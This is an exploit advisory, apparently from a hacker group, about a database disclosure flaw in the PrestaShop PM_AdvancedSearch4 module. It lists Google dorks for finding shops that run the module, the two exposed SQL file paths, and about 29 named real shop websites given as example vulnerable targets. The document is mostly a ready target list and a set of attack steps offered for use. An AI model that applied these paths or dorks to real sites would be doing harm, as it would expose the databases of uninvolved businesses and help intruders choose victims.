#################################################################################################
# Exploit Title : PrestaShop PM_AdvancedSearch4 Modules 1.6.1.18 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/fr/recherches-filtres/2778-advanced-search-4.html
+ addons.prestashop.com/es/busquedas-filtros/2778-advanced-search-4.html
+ addons.prestashop.com/en/search-filters/2778-advanced-search-4.html
# Software Price : 200 Euro
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.6.2 - 1.4.10.0 - 1.4.9.0 - 1.4.8.2 -
1.4.7.0 - 1.5.6.0 - 1.6.0.12± - 1.6.1.1± - 1.6.1.17 - 1.6.1.4 - 1.6.1.18
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_advancedsearch4/''
intext:''© 2011 TS3V - Alarme-camera.fr''
intext:''cron module by samdha.net''
intext:''site realise par studio gonzo!''
intext:''© 2018 · acmotos · Tienda online de accesorios y recambios de moto.''
intext:''© CordesExpress groupe MPROSHOP - Tous droits réservés''
intext:'' © 2018 Approach Diffusion''
intext:''Piecesanspermis.fr 2018. Tous droit réservés.''
intext:''Design graphique : Regard Sur - Conception de site e-commerce : Sarah Ligerot''
intext:''© 2015-2018 - GROUPE GENIN''
intext:''2014 Advanced Power Systems All Rights Reserved'' site:shop
intext:''conception anamorphik'' site:fr
intext:''Copyright © MyBeers - 2018 |Création Tooeasy''
intext:''Powered by Blulab'' site:pl
intext:''© Design by cybervelo''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# PacketStormSecurity Exploit Reference Link :
packetstormsecurity.com/files/150908/PrestaShop-PM_AdvancedSearch4-1.6.1.18-Database-Disclosure.html
#################################################################################################
# Exploit :
/modules/pm_advancedsearch4/install_base.sql
/modules/pm_advancedsearch4/install_dyn.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] unami-store.com/modules/pm_advancedsearch4/install_base.sql
[+] timeshoes.fr/modules/pm_advancedsearch4/install_base.sql
[+] zazopack.com/modules/pm_advancedsearch4/install_base.sql
[+] modelisme-vartex.com/modules/pm_advancedsearch4/install_dyn.sql
[+] interieur-expression.com/modules/pm_advancedsearch4/install_dyn.sql
[+] livingstonesgallery.com/modules/pm_advancedsearch4/install_dyn.sql
[+] lounacasa.com/modules/pm_advancedsearch4/install_dyn.sql
[+] formulapesca.com/modules/pm_advancedsearch4/install_dyn.sql
[+] acmotos.com/modules/pm_advancedsearch4/install_dyn.sql
[+] vspieces.com/modules/pm_advancedsearch4/install_dyn.sql
[+] fesea.shop/modules/pm_advancedsearch4/install_dyn.sql
[+] bikila.com/modules/pm_advancedsearch4/install_dyn.sql
[+] alsace-sports-nautiques.com/modules/pm_advancedsearch4/install_dyn.sql
[+] cordesexpress.com/modules/pm_advancedsearch4/install_dyn.sql
[+] cybervelo.com/modules/pm_advancedsearch4/install_base.sql
[+] erbolario.pl/modules/pm_advancedsearch4/install_base.sql
[+] slowfoodeditore.it/modules/pm_advancedsearch4/install_base.sql
[+] les7royaumes.com/modules/pm_advancedsearch4/install_base.sql
[+] piecesanspermis.fr/modules/pm_advancedsearch4/install_base.sql
[+] lespaniersdedavid.com/modules/pm_advancedsearch4/install_base.sql
[+] phytomedica.fr/modules/pm_advancedsearch4/install_base.sql
[+] marilashoes.com/modules/pm_advancedsearch4/install_base.sql
[+] well.fr/modules/pm_advancedsearch4/install_base.sql
[+] avecdesbijoux.fr/modules/pm_advancedsearch4/install_base.sql
[+] groupe-genin.fr/modules/pm_advancedsearch4/install_base.sql
[+] onduleur.shop/modules/pm_advancedsearch4/install_base.sql
[+] mini-auto-parts.co.uk/modules/pm_advancedsearch4/install_base.sql
[+] mybeers.fr/modules/pm_advancedsearch4/install_base.sql
[+] ventidecor.com/modules/pm_advancedsearch4/install_base.sql
#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################